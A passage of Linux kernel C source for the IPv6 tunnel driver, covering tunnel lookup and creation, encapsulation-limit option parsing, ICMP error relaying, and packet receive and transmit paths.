for_each_ip6_tunnel_rcu(ip6n->tnls_r_l[hash]) {
if (ipv6_addr_equal(local, &t->parms.laddr) &&
ipv6_addr_equal(remote, &t->parms.raddr) &&
(t->dev->flags & IFF_UP))
return t;
}
memset(&any, 0, sizeof(any));
hash = HASH(&any, local);
for_each_ip6_tunnel_rcu(ip6n->tnls_r_l[hash]) {
if (ipv6_addr_equal(local, &t->parms.laddr) &&
(t->dev->flags & IFF_UP))
return t;
}
hash = HASH(remote, &any);
for_each_ip6_tunnel_rcu(ip6n->tnls_r_l[hash]) {
if (ipv6_addr_equal(remote, &t->parms.raddr) &&
(t->dev->flags & IFF_UP))
return t;
}
t = rcu_dereference(ip6n->tnls_wc[0]);
if (t && (t->dev->flags & IFF_UP))
return t;
return NULL;
}
/**
* ip6_tnl_bucket - get head of list matching given tunnel parameters
* @p: parameters containing tunnel end-points
*
* Description:
* ip6_tnl_bucket() returns the head of the list matching the
* &struct in6_addr entries laddr and raddr in @p.
*
* Return: head of IPv6 tunnel list
**/
static struct ip6_tnl __rcu **
ip6_tnl_bucket(struct ip6_tnl_net *ip6n, const struct __ip6_tnl_parm *p)
{
const struct in6_addr *remote = &p->raddr;
const struct in6_addr *local = &p->laddr;
unsigned int h = 0;
int prio = 0;
if (!ipv6_addr_any(remote) || !ipv6_addr_any(local)) {
prio = 1;
h = HASH(remote, local);
}
return &ip6n->tnls[prio][h];
}
/**
* ip6_tnl_link - add tunnel to hash table
* @t: tunnel to be added
**/
static void
ip6_tnl_link(struct ip6_tnl_net *ip6n, struct ip6_tnl *t)
{
struct ip6_tnl __rcu **tp = ip6_tnl_bucket(ip6n, &t->parms);
rcu_assign_pointer(t->next , rtnl_dereference(*tp));
rcu_assign_pointer(*tp, t);
}
/**
* ip6_tnl_unlink - remove tunnel from hash table
* @t: tunnel to be removed
**/
static void
ip6_tnl_unlink(struct ip6_tnl_net *ip6n, struct ip6_tnl *t)
{
struct ip6_tnl __rcu **tp;
struct ip6_tnl *iter;
for (tp = ip6_tnl_bucket(ip6n, &t->parms);
(iter = rtnl_dereference(*tp)) != NULL;
tp = &iter->next) {
if (t == iter) {
rcu_assign_pointer(*tp, t->next);
break;
}
}
}
static void ip6_dev_free(struct net_device *dev)
{
free_percpu(dev->tstats);
free_netdev(dev);
}
static int ip6_tnl_create2(struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
struct net *net = dev_net(dev);
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
int err;
t = netdev_priv(dev);
err = register_netdevice(dev);
if (err < 0)
goto out;
strcpy(t->parms.name, dev->name);
dev->rtnl_link_ops = &ip6_link_ops;
dev_hold(dev);
ip6_tnl_link(ip6n, t);
return 0;
out:
return err;
}
/**
* ip6_tnl_create - create a new tunnel
* @p: tunnel parameters
* @pt: pointer to new tunnel
*
* Description:
* Create tunnel matching given parameters.
*
* Return:
* created tunnel or error pointer
**/
static struct ip6_tnl *ip6_tnl_create(struct net *net, struct __ip6_tnl_parm *p)
{
struct net_device *dev;
struct ip6_tnl *t;
char name[IFNAMSIZ];
int err = -ENOMEM;
if (p->name[0])
strlcpy(name, p->name, IFNAMSIZ);
else
sprintf(name, "ip6tnl%%d");
dev = alloc_netdev(sizeof(*t), name, NET_NAME_UNKNOWN,
ip6_tnl_dev_setup);
if (dev == NULL)
goto failed;
dev_net_set(dev, net);
t = netdev_priv(dev);
t->parms = *p;
t->net = dev_net(dev);
err = ip6_tnl_create2(dev);
if (err < 0)
goto failed_free;
return t;
failed_free:
ip6_dev_free(dev);
failed:
return ERR_PTR(err);
}
/**
* ip6_tnl_locate - find or create tunnel matching given parameters
* @p: tunnel parameters
* @create: != 0 if allowed to create new tunnel if no match found
*
* Description:
* ip6_tnl_locate() first tries to locate an existing tunnel
* based on @parms. If this is unsuccessful, but @create is set a new
* tunnel device is created and registered for use.
*
* Return:
* matching tunnel or error pointer
**/
static struct ip6_tnl *ip6_tnl_locate(struct net *net,
struct __ip6_tnl_parm *p, int create)
{
const struct in6_addr *remote = &p->raddr;
const struct in6_addr *local = &p->laddr;
struct ip6_tnl __rcu **tp;
struct ip6_tnl *t;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
for (tp = ip6_tnl_bucket(ip6n, p);
(t = rtnl_dereference(*tp)) != NULL;
tp = &t->next) {
if (ipv6_addr_equal(local, &t->parms.laddr) &&
ipv6_addr_equal(remote, &t->parms.raddr)) {
if (create)
return ERR_PTR(-EEXIST);
return t;
}
}
if (!create)
return ERR_PTR(-ENODEV);
return ip6_tnl_create(net, p);
}
/**
* ip6_tnl_dev_uninit - tunnel device uninitializer
* @dev: the device to be destroyed
*
* Description:
* ip6_tnl_dev_uninit() removes tunnel from its list
**/
static void
ip6_tnl_dev_uninit(struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
struct net *net = t->net;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
if (dev == ip6n->fb_tnl_dev)
RCU_INIT_POINTER(ip6n->tnls_wc[0], NULL);
else
ip6_tnl_unlink(ip6n, t);
ip6_tnl_dst_reset(t);
dev_put(dev);
}
/**
* parse_tvl_tnl_enc_lim - handle encapsulation limit option
* @skb: received socket buffer
*
* Return:
* 0 if none was found,
* else index to encapsulation limit
**/
__u16 ip6_tnl_parse_tlv_enc_lim(struct sk_buff *skb, __u8 *raw)
{
const struct ipv6hdr *ipv6h = (const struct ipv6hdr *) raw;
__u8 nexthdr = ipv6h->nexthdr;
__u16 off = sizeof(*ipv6h);
while (ipv6_ext_hdr(nexthdr) && nexthdr != NEXTHDR_NONE) {
__u16 optlen = 0;
struct ipv6_opt_hdr *hdr;
if (raw + off + sizeof(*hdr) > skb->data &&
!pskb_may_pull(skb, raw - skb->data + off + sizeof (*hdr)))
break;
hdr = (struct ipv6_opt_hdr *) (raw + off);
if (nexthdr == NEXTHDR_FRAGMENT) {
struct frag_hdr *frag_hdr = (struct frag_hdr *) hdr;
if (frag_hdr->frag_off)
break;
optlen = 8;
} else if (nexthdr == NEXTHDR_AUTH) {
optlen = (hdr->hdrlen + 2) << 2;
} else {
optlen = ipv6_optlen(hdr);
}
if (nexthdr == NEXTHDR_DEST) {
__u16 i = off + 2;
while (1) {
struct ipv6_tlv_tnl_enc_lim *tel;
/* No more room for encapsulation limit */
if (i + sizeof (*tel) > off + optlen)
break;
tel = (struct ipv6_tlv_tnl_enc_lim *) &raw[i];
/* return index of option if found and valid */
if (tel->type == IPV6_TLV_TNL_ENCAP_LIMIT &&
tel->length == 1)
return i;
/* else jump to next option */
if (tel->type)
i += tel->length + 2;
else
i++;
}
}
nexthdr = hdr->nexthdr;
off += optlen;
}
return 0;
}
EXPORT_SYMBOL(ip6_tnl_parse_tlv_enc_lim);
/**
* ip6_tnl_err - tunnel error handler
*
* Description:
* ip6_tnl_err() should handle errors in the tunnel according
* to the specifications in RFC 2473.
**/
static int
ip6_tnl_err(struct sk_buff *skb, __u8 ipproto, struct inet6_skb_parm *opt,
u8 *type, u8 *code, int *msg, __u32 *info, int offset)
{
const struct ipv6hdr *ipv6h = (const struct ipv6hdr *) skb->data;
struct ip6_tnl *t;
int rel_msg = 0;
u8 rel_type = ICMPV6_DEST_UNREACH;
u8 rel_code = ICMPV6_ADDR_UNREACH;
u8 tproto;
__u32 rel_info = 0;
__u16 len;
int err = -ENOENT;
/* If the packet doesn't contain the original IPv6 header we are
in trouble since we might need the source address for further
processing of the error. */
rcu_read_lock();
t = ip6_tnl_lookup(dev_net(skb->dev), &ipv6h->daddr, &ipv6h->saddr);
if (t == NULL)
goto out;
tproto = ACCESS_ONCE(t->parms.proto);
if (tproto != ipproto && tproto != 0)
goto out;
err = 0;
switch (*type) {
__u32 teli;
struct ipv6_tlv_tnl_enc_lim *tel;
__u32 mtu;
case ICMPV6_DEST_UNREACH:
net_warn_ratelimited("%s: Path to destination invalid or inactive!\n",
t->parms.name);
rel_msg = 1;
break;
case ICMPV6_TIME_EXCEED:
if ((*code) == ICMPV6_EXC_HOPLIMIT) {
net_warn_ratelimited("%s: Too small hop limit or routing loop in tunnel!\n",
t->parms.name);
rel_msg = 1;
}
break;
case ICMPV6_PARAMPROB:
teli = 0;
if ((*code) == ICMPV6_HDR_FIELD)
teli = ip6_tnl_parse_tlv_enc_lim(skb, skb->data);
if (teli && teli == *info - 2) {
tel = (struct ipv6_tlv_tnl_enc_lim *) &skb->data[teli];
if (tel->encap_limit == 0) {
net_warn_ratelimited("%s: Too small encapsulation limit or routing loop in tunnel!\n",
t->parms.name);
rel_msg = 1;
}
} else {
net_warn_ratelimited("%s: Recipient unable to parse tunneled packet!\n",
t->parms.name);
}
break;
case ICMPV6_PKT_TOOBIG:
mtu = *info - offset;
if (mtu < IPV6_MIN_MTU)
mtu = IPV6_MIN_MTU;
t->dev->mtu = mtu;
len = sizeof(*ipv6h) + ntohs(ipv6h->payload_len);
if (len > mtu) {
rel_type = ICMPV6_PKT_TOOBIG;
rel_code = 0;
rel_info = mtu;
rel_msg = 1;
}
break;
}
*type = rel_type;
*code = rel_code;
*info = rel_info;
*msg = rel_msg;
out:
rcu_read_unlock();
return err;
}
static int
ip4ip6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
u8 type, u8 code, int offset, __be32 info)
{
int rel_msg = 0;
u8 rel_type = type;
u8 rel_code = code;
__u32 rel_info = ntohl(info);
int err;
struct sk_buff *skb2;
const struct iphdr *eiph;
struct rtable *rt;
struct flowi4 fl4;
err = ip6_tnl_err(skb, IPPROTO_IPIP, opt, &rel_type, &rel_code,
&rel_msg, &rel_info, offset);
if (err < 0)
return err;
if (rel_msg == 0)
return 0;
switch (rel_type) {
case ICMPV6_DEST_UNREACH:
if (rel_code != ICMPV6_ADDR_UNREACH)
return 0;
rel_type = ICMP_DEST_UNREACH;
rel_code = ICMP_HOST_UNREACH;
break;
case ICMPV6_PKT_TOOBIG:
if (rel_code != 0)
return 0;
rel_type = ICMP_DEST_UNREACH;
rel_code = ICMP_FRAG_NEEDED;
break;
case NDISC_REDIRECT:
rel_type = ICMP_REDIRECT;
rel_code = ICMP_REDIR_HOST;
default:
return 0;
}
if (!pskb_may_pull(skb, offset + sizeof(struct iphdr)))
return 0;
skb2 = skb_clone(skb, GFP_ATOMIC);
if (!skb2)
return 0;
skb_dst_drop(skb2);
skb_pull(skb2, offset);
skb_reset_network_header(skb2);
eiph = ip_hdr(skb2);
/* Try to guess incoming interface */
rt = ip_route_output_ports(dev_net(skb->dev), &fl4, NULL,
eiph->saddr, 0,
0, 0,
IPPROTO_IPIP, RT_TOS(eiph->tos), 0);
if (IS_ERR(rt))
goto out;
skb2->dev = rt->dst.dev;
/* route "incoming" packet */
if (rt->rt_flags & RTCF_LOCAL) {
ip_rt_put(rt);
rt = NULL;
rt = ip_route_output_ports(dev_net(skb->dev), &fl4, NULL,
eiph->daddr, eiph->saddr,
0, 0,
IPPROTO_IPIP,
RT_TOS(eiph->tos), 0);
if (IS_ERR(rt) ||
rt->dst.dev->type != ARPHRD_TUNNEL) {
if (!IS_ERR(rt))
ip_rt_put(rt);
goto out;
}
skb_dst_set(skb2, &rt->dst);
} else {
ip_rt_put(rt);
if (ip_route_input(skb2, eiph->daddr, eiph->saddr, eiph->tos,
skb2->dev) ||
skb_dst(skb2)->dev->type != ARPHRD_TUNNEL)
goto out;
}
/* change mtu on this route */
if (rel_type == ICMP_DEST_UNREACH && rel_code == ICMP_FRAG_NEEDED) {
if (rel_info > dst_mtu(skb_dst(skb2)))
goto out;
skb_dst(skb2)->ops->update_pmtu(skb_dst(skb2), NULL, skb2, rel_info);
}
if (rel_type == ICMP_REDIRECT)
skb_dst(skb2)->ops->redirect(skb_dst(skb2), NULL, skb2);
icmp_send(skb2, rel_type, rel_code, htonl(rel_info));
out:
kfree_skb(skb2);
return 0;
}
static int
ip6ip6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
u8 type, u8 code, int offset, __be32 info)
{
int rel_msg = 0;
u8 rel_type = type;
u8 rel_code = code;
__u32 rel_info = ntohl(info);
int err;
err = ip6_tnl_err(skb, IPPROTO_IPV6, opt, &rel_type, &rel_code,
&rel_msg, &rel_info, offset);
if (err < 0)
return err;
if (rel_msg && pskb_may_pull(skb, offset + sizeof(struct ipv6hdr))) {
struct rt6_info *rt;
struct sk_buff *skb2 = skb_clone(skb, GFP_ATOMIC);
if (!skb2)
return 0;
skb_dst_drop(skb2);
skb_pull(skb2, offset);
skb_reset_network_header(skb2);
/* Try to guess incoming interface */
rt = rt6_lookup(dev_net(skb->dev), &ipv6_hdr(skb2)->saddr,
NULL, 0, 0);
if (rt && rt->dst.dev)
skb2->dev = rt->dst.dev;
icmpv6_send(skb2, rel_type, rel_code, rel_info);
ip6_rt_put(rt);
kfree_skb(skb2);
}
return 0;
}
static int ip4ip6_dscp_ecn_decapsulate(const struct ip6_tnl *t,
const struct ipv6hdr *ipv6h,
struct sk_buff *skb)
{
__u8 dsfield = ipv6_get_dsfield(ipv6h) & ~INET_ECN_MASK;
if (t->parms.flags & IP6_TNL_F_RCV_DSCP_COPY)
ipv4_change_dsfield(ip_hdr(skb), INET_ECN_MASK, dsfield);
return IP6_ECN_decapsulate(ipv6h, skb);
}
static int ip6ip6_dscp_ecn_decapsulate(const struct ip6_tnl *t,
const struct ipv6hdr *ipv6h,
struct sk_buff *skb)
{
if (t->parms.flags & IP6_TNL_F_RCV_DSCP_COPY)
ipv6_copy_dscp(ipv6_get_dsfield(ipv6h), ipv6_hdr(skb));
return IP6_ECN_decapsulate(ipv6h, skb);
}
__u32 ip6_tnl_get_cap(struct ip6_tnl *t,
const struct in6_addr *laddr,
const struct in6_addr *raddr)
{
struct __ip6_tnl_parm *p = &t->parms;
int ltype = ipv6_addr_type(laddr);
int rtype = ipv6_addr_type(raddr);
__u32 flags = 0;
if (ltype == IPV6_ADDR_ANY || rtype == IPV6_ADDR_ANY) {
flags = IP6_TNL_F_CAP_PER_PACKET;
} else if (ltype & (IPV6_ADDR_UNICAST|IPV6_ADDR_MULTICAST) &&
rtype & (IPV6_ADDR_UNICAST|IPV6_ADDR_MULTICAST) &&
!((ltype|rtype) & IPV6_ADDR_LOOPBACK) &&
(!((ltype|rtype) & IPV6_ADDR_LINKLOCAL) || p->link)) {
if (ltype&IPV6_ADDR_UNICAST)
flags |= IP6_TNL_F_CAP_XMIT;
if (rtype&IPV6_ADDR_UNICAST)
flags |= IP6_TNL_F_CAP_RCV;
}
return flags;
}
EXPORT_SYMBOL(ip6_tnl_get_cap);
/* called with rcu_read_lock() */
int ip6_tnl_rcv_ctl(struct ip6_tnl *t,
const struct in6_addr *laddr,
const struct in6_addr *raddr)
{
struct __ip6_tnl_parm *p = &t->parms;
int ret = 0;
struct net *net = t->net;
if ((p->flags & IP6_TNL_F_CAP_RCV) ||
((p->flags & IP6_TNL_F_CAP_PER_PACKET) &&
(ip6_tnl_get_cap(t, laddr, raddr) & IP6_TNL_F_CAP_RCV))) {
struct net_device *ldev = NULL;
if (p->link)
ldev = dev_get_by_index_rcu(net, p->link);
if ((ipv6_addr_is_multicast(laddr) ||
likely(ipv6_chk_addr(net, laddr, ldev, 0))) &&
likely(!ipv6_chk_addr(net, raddr, NULL, 0)))
ret = 1;
}
return ret;
}
EXPORT_SYMBOL_GPL(ip6_tnl_rcv_ctl);
/**
* ip6_tnl_rcv - decapsulate IPv6 packet and retransmit it locally
* @skb: received socket buffer
* @protocol: ethernet protocol ID
* @dscp_ecn_decapsulate: the function to decapsulate DSCP code and ECN
*
* Return: 0
**/
static int ip6_tnl_rcv(struct sk_buff *skb, __u16 protocol,
__u8 ipproto,
int (*dscp_ecn_decapsulate)(const struct ip6_tnl *t,
const struct ipv6hdr *ipv6h,
struct sk_buff *skb))
{
struct ip6_tnl *t;
const struct ipv6hdr *ipv6h = ipv6_hdr(skb);
u8 tproto;
int err;
rcu_read_lock();
t = ip6_tnl_lookup(dev_net(skb->dev), &ipv6h->saddr, &ipv6h->daddr);
if (t != NULL) {
struct pcpu_sw_netstats *tstats;
tproto = ACCESS_ONCE(t->parms.proto);
if (tproto != ipproto && tproto != 0) {
rcu_read_unlock();
goto discard;
}
if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
rcu_read_unlock();
goto discard;
}
if (!ip6_tnl_rcv_ctl(t, &ipv6h->daddr, &ipv6h->saddr)) {
t->dev->stats.rx_dropped++;
rcu_read_unlock();
goto discard;
}
skb->mac_header = skb->network_header;
skb_reset_network_header(skb);
skb->protocol = htons(protocol);
memset(skb->cb, 0, sizeof(struct inet6_skb_parm));
__skb_tunnel_rx(skb, t->dev, t->net);
err = dscp_ecn_decapsulate(t, ipv6h, skb);
if (unlikely(err)) {
if (log_ecn_error)
net_info_ratelimited("non-ECT from %pI6 with dsfield=%#x\n",
&ipv6h->saddr,
ipv6_get_dsfield(ipv6h));
if (err > 1) {
++t->dev->stats.rx_frame_errors;
++t->dev->stats.rx_errors;
rcu_read_unlock();
goto discard;
}
}
tstats = this_cpu_ptr(t->dev->tstats);
u64_stats_update_begin(&tstats->syncp);
tstats->rx_packets++;
tstats->rx_bytes += skb->len;
u64_stats_update_end(&tstats->syncp);
netif_rx(skb);
rcu_read_unlock();
return 0;
}
rcu_read_unlock();
return 1;
discard:
kfree_skb(skb);
return 0;
}
static int ip4ip6_rcv(struct sk_buff *skb)
{
return ip6_tnl_rcv(skb, ETH_P_IP, IPPROTO_IPIP,
ip4ip6_dscp_ecn_decapsulate);
}
static int ip6ip6_rcv(struct sk_buff *skb)
{
return ip6_tnl_rcv(skb, ETH_P_IPV6, IPPROTO_IPV6,
ip6ip6_dscp_ecn_decapsulate);
}
struct ipv6_tel_txoption {
struct ipv6_txoptions ops;
__u8 dst_opt[8];
};
static void init_tel_txopt(struct ipv6_tel_txoption *opt, __u8 encap_limit)
{
memset(opt, 0, sizeof(struct ipv6_tel_txoption));
opt->dst_opt[2] = IPV6_TLV_TNL_ENCAP_LIMIT;
opt->dst_opt[3] = 1;
opt->dst_opt[4] = encap_limit;
opt->dst_opt[5] = IPV6_TLV_PADN;
opt->dst_opt[6] = 1;
opt->ops.dst0opt = (struct ipv6_opt_hdr *) opt->dst_opt;
opt->ops.opt_nflen = 8;
}
/**
* ip6_tnl_addr_conflict - compare packet addresses to tunnel's own
* @t: the outgoing tunnel device
* @hdr: IPv6 header from the incoming packet
*
* Description:
* Avoid trivial tunneling loop by checking that tunnel exit-point
* doesn't match source of incoming packet.
*
* Return:
* 1 if conflict,
* 0 else
**/
static inline bool
ip6_tnl_addr_conflict(const struct ip6_tnl *t, const struct ipv6hdr *hdr)
{
return ipv6_addr_equal(&t->parms.raddr, &hdr->saddr);
}
int ip6_tnl_xmit_ctl(struct ip6_tnl *t,
const struct in6_addr *laddr,
const struct in6_addr *raddr)
{
struct __ip6_tnl_parm *p = &t->parms;
int ret = 0;
struct net *net = t->net;
if ((p->flags & IP6_TNL_F_CAP_XMIT) ||
((p->flags & IP6_TNL_F_CAP_PER_PACKET) &&
(ip6_tnl_get_cap(t, laddr, raddr) & IP6_TNL_F_CAP_XMIT))) {
struct net_device *ldev = NULL;
rcu_read_lock();
if (p->link)
ldev = dev_get_by_index_rcu(net, p->link);
if (unlikely(!ipv6_chk_addr(net, laddr, ldev, 0)))
pr_warn("%s xmit: Local address not yet configured!\n",
p->name);
else if (!ipv6_addr_is_multicast(raddr) &&
unlikely(ipv6_chk_addr(net, raddr, NULL, 0)))
pr_warn("%s xmit: Routing loop! Remote address found on this node!\n",
p->name);
else
ret = 1;
rcu_read_unlock();
}
return ret;
}
EXPORT_SYMBOL_GPL(ip6_tnl_xmit_ctl);
/**
* ip6_tnl_xmit2 - encapsulate packet and send
* @skb: the outgoing socket buffer
* @dev: the outgoing tunnel device
* @dsfield: dscp code for outer header
* @fl: flow of tunneled packet
* @encap_limit: encapsulation limit
* @pmtu: Path MTU is stored if packet is too big
*
* Description:
* Build new header and do some sanity checks on the packet before sending
* it.
*
* Return:
* 0 on success
* -1 fail
* %-EMSGSIZE message too big. return mtu in this case.
**/
static int ip6_tnl_xmit2(struct sk_buff *skb,
struct net_device *dev,
__u8 dsfield,
struct flowi6 *fl6,
int encap_limit,
__u32 *pmtu)
{
struct ip6_tnl *t = netdev_priv(dev);
struct net *net = t->net;
struct net_device_stats *stats = &t->dev->stats;
struct ipv6hdr *ipv6h = ipv6_hdr(skb);
struct ipv6_tel_txoption opt;
struct dst_entry *dst = NULL, *ndst = NULL;
struct net_device *tdev;
int mtu;
unsigned int max_headroom = sizeof(struct ipv6hdr);
u8 proto;
int err = -1;
/* NBMA tunnel */
if (ipv6_addr_any(&t->parms.raddr)) {
struct in6_addr *addr6;
struct neighbour *neigh;
int addr_type;
if (!skb_dst(skb))
goto tx_err_link_failure;
neigh = dst_neigh_lookup(skb_dst(skb),
&ipv6_hdr(skb)->daddr);
if (!neigh)
goto tx_err_link_failure;
addr6 = (struct in6_addr *)&neigh->primary_key;
addr_type = ipv6_addr_type(addr6);
if (addr_type == IPV6_ADDR_ANY)
addr6 = &ipv6_hdr(skb)->daddr;
memcpy(&fl6->daddr, addr6, sizeof(fl6->daddr));
neigh_release(neigh);
} else if (!fl6->flowi6_mark)
dst = ip6_tnl_dst_check(t);
if (!ip6_tnl_xmit_ctl(t, &fl6->saddr, &fl6->daddr))
goto tx_err_link_failure;
if (!dst) {
ndst = ip6_route_output(net, NULL, fl6);
if (ndst->error)
goto tx_err_link_failure;
ndst = xfrm_lookup(net, ndst, flowi6_to_flowi(fl6), NULL, 0);
if (IS_ERR(ndst)) {
err = PTR_ERR(ndst);
ndst = NULL;
goto tx_err_link_failure;
}
dst = ndst;
}
tdev = dst->dev;
if (tdev == dev) {
stats->collisions++;
net_warn_ratelimited("%s: Local routing loop detected!\n",
t->parms.name);
goto tx_err_dst_release;
}
mtu = dst_mtu(dst) - sizeof(*ipv6h);
if (encap_limit >= 0) {
max_headroom += 8;
mtu -= 8;
}
if (mtu < IPV6_MIN_MTU)
mtu = IPV6_MIN_MTU;
if (skb_dst(skb))
skb_dst(skb)->ops->update_pmtu(skb_dst(skb), NULL, skb, mtu);
if (skb->len > mtu) {
*pmtu = mtu;
err = -EMSGSIZE;
goto tx_err_dst_release;
}
skb_scrub_packet(skb, !net_eq(t->net, dev_net(dev)));
/*
* Okay, now see if we can stuff it in the buffer as-is.
*/
max_headroom += LL_RESERVED_SPACE(tdev);
if (skb_headroom(skb) < max_headroom || skb_shared(skb) ||
(skb_cloned(skb) && !skb_clone_writable(skb, 0))) {
struct sk_buff *new_skb;
new_skb = skb_realloc_headroom(skb, max_headroom);
if (!new_skb)
goto tx_err_dst_release;
if (skb->sk)
skb_set_owner_w(new_skb, skb->sk);
consume_skb(skb);
skb = new_skb;
}
if (fl6->flowi6_mark) {
skb_dst_set(skb, dst);
ndst = NULL;
} else {
skb_dst_set_noref(skb, dst);
}
skb->transport_header = skb->network_header;
proto = fl6->flowi6_proto;
if (encap_limit >= 0) {
init_tel_txopt(&opt, encap_limit);
ipv6_push_nfrag_opts(skb, &opt.ops, &proto, NULL);
}
if (likely(!skb->encapsulation)) {
skb_reset_inner_headers(skb);
skb->encapsulation = 1;
}
skb_push(skb, sizeof(struct ipv6hdr));
skb_reset_network_header(skb);
ipv6h = ipv6_hdr(skb);
ip6_flow_hdr(ipv6h, INET_ECN_encapsulate(0, dsfield),
ip6_make_flowlabel(net, skb, fl6->flowlabel, false));
ipv6h->hop_limit = t->parms.hop_limit;
ipv6h->nexthdr = proto;
ipv6h->saddr = fl6->saddr;
ipv6h->daddr = fl6->daddr;
ip6tunnel_xmit(skb, dev);
if (ndst)
ip6_tnl_dst_store(t, ndst);
return 0;
tx_err_link_failure:
stats->tx_carrier_errors++;
dst_link_failure(skb);
tx_err_dst_release:
dst_release(ndst);
return err;
}
static inline int
ip4ip6_tnl_xmit(struct sk_buff *skb, struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
const struct iphdr *iph = ip_hdr(skb);
int encap_limit = -1;
struct flowi6 fl6;
__u8 dsfield;
__u32 mtu;
u8 tproto;
int err;
tproto = ACCESS_ONCE(t->parms.proto);
if (tproto != IPPROTO_IPIP && tproto != 0)
return -1;
if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
encap_limit = t->parms.encap_limit;
memcpy(&fl6, &t->fl.u.ip6, sizeof(fl6));
fl6.flowi6_proto = IPPROTO_IPIP;
dsfield = ipv4_get_dsfield(iph);
if (t->parms.flags & IP6_TNL_F_USE_ORIG_TCLASS)
fl6.flowlabel |= htonl((__u32)iph->tos << IPV6_TCLASS_SHIFT)
& IPV6_TCLASS_MASK;
if (t->parms.flags & IP6_TNL_F_USE_ORIG_FWMARK)
fl6.flowi6_mark = skb->mark;
err = ip6_tnl_xmit2(skb, dev, dsfield, &fl6, encap_limit, &mtu);
if (err != 0) {
/* XXX: send ICMP error even if DF is not set. */
if (err == -EMSGSIZE)
icmp_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED,
htonl(mtu));
return -1;
}
return 0;
}
static inline int
ip6ip6_tnl_xmit(struct sk_buff *skb, struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
struct ipv6hdr *ipv6h = ipv6_hdr(skb);
int encap_limit = -1;
__u16 offset;
struct flowi6 fl6;
__u8 dsfield;
__u32 mtu;
u8 tproto;
int err;
tproto = ACCESS_ONCE(t->parms.proto);
if ((tproto != IPPROTO_IPV6 && tproto != 0) ||
ip6_tnl_addr_conflict(t, ipv6h))
return -1;
offset = ip6_tnl_parse_tlv_enc_lim(skb, skb_network_header(skb));
if (offset > 0) {
struct ipv6_tlv_tnl_enc_lim *tel;
tel = (struct ipv6_tlv_tnl_enc_lim *)&skb_network_header(skb)[offset];
if (tel->encap_limit == 0) {
icmpv6_send(skb, ICMPV6_PARAMPROB,
ICMPV6_HDR_FIELD, offset + 2);
return -1;
}
encap_limit = tel->encap_limit - 1;
} else if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
encap_limit = t->parms.encap_limit;
memcpy(&fl6, &t->fl.u.ip6, sizeof(fl6));
fl6.flowi6_proto = IPPROTO_IPV6;
dsfield = ipv6_get_dsfield(ipv6h);
if (t->parms.flags & IP6_TNL_F_USE_ORIG_TCLASS)
fl6.flowlabel |= (*(__be32 *) ipv6h & IPV6_TCLASS_MASK);
if (t->parms.flags & IP6_TNL_F_USE_ORIG_FLOWLABEL)
fl6.flowlabel |= ip6_flowlabel(ipv6h);
if (t->parms.flags & IP6_TNL_F_USE_ORIG_FWMARK)
fl6.flowi6_mark = skb->mark;
err = ip6_tnl_xmit2(skb, dev, dsfield, &fl6, encap_limit, &mtu);
if (err != 0) {
if (err == -EMSGSIZE)
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, mtu);
return -1;
}
return 0;
}
static netdev_tx_t
ip6_tnl_xmit(struct sk_buff *skb, struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
struct net_device_stats *stats = &t->dev->stats;
int ret;
switch (skb->protocol) {
case htons(ETH_P_IP):
ret = ip4ip6_tnl_xmit(skb, dev);
break;
case htons(ETH_P_IPV6):
ret = ip6ip6_tnl_xmit(skb, dev);
break;
default:
goto tx_err;
}
if (ret < 0)
goto tx_err;
return NETDEV_TX_OK;
tx_err:
stats->tx_errors++;
stats->tx_dropped++;
kfree_skb(skb);
return NETDEV_TX_OK;
}
static void ip6_tnl_link_config(struct ip6_tnl *t)
{
struct net_device *dev = t->dev;
struct __ip6_tnl_parm *p = &t->parms;
struct flowi6 *fl6 = &t->fl.u.ip6;
memcpy(dev->dev_addr, &p->laddr, sizeof(struct in6_addr));
memcpy(dev->broadcast, &p->raddr, sizeof(struct in6_addr));
/* Set up flowi template */
fl6->saddr = p->laddr;
fl6->daddr = p->raddr;
fl6->flowi6_oif = p->link;
fl6->flowlabel = 0;
if (!(p->flags&IP6_TNL_F_USE_ORIG_TCLASS))
fl6->flowlabel |= IPV6_TCLASS_MASK & p->flowinfo;
if (!(p->flags&IP6_TNL_F_USE_ORIG_FLOWLABEL))
fl6->flowlabel |= IPV6_FLOWLABEL_MASK & p->flowinfo;
p->flags &= ~(IP6_TNL_F_CAP_XMIT|IP6_TNL_F_CAP_RCV|IP6_TNL_F_CAP_PER_PACKET);
p->flags |= ip6_tnl_get_cap(t, &p->laddr, &p->raddr);
if (p->flags&IP6_TNL_F_CAP_XMIT && p->flags&IP6_TNL_F_CAP_RCV)
dev->flags |= IFF_POINTOPOINT;
else
dev->flags &= ~IFF_POINTOPOINT;
dev->iflink = p->link;
if (p->flags & IP6_TNL_F_CAP_XMIT) {
int strict = (ipv6_addr_type(&p->raddr) &
(IPV6_ADDR_MULTICAST|IPV6_ADDR_LINKLOCAL));
struct rt6_info *rt = rt6_lookup(t->net,
&p->raddr, &p->laddr,
p->link, strict);
if (rt == NULL)
return;
if (rt->dst.dev) {
dev->hard_header_len = rt->dst.dev->hard_header_len +
sizeof(struct ipv6hdr);
dev->mtu = rt->dst.dev->mtu - sizeof(struct ipv6hdr);
if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
dev->mtu -= 8;
if (dev->mtu < IPV6_MIN_MTU)
dev->mtu = IPV6_MIN_MTU;
}
ip6_rt_put(rt);
}
}
/**
* ip6_tnl_change - update the tunnel parameters
* @t: tunnel to be changed
* @p: tunnel configuration parameters
*
* Description:
* ip6_tnl_change() updates the tunnel parameters
**/
static int
ip6_tnl_change(struct ip6_tnl *t, const struct __ip6_tnl_parm *p)
{
t->parms.laddr = p->laddr;
t->parms.raddr = p->raddr;
t->parms.flags = p->flags;
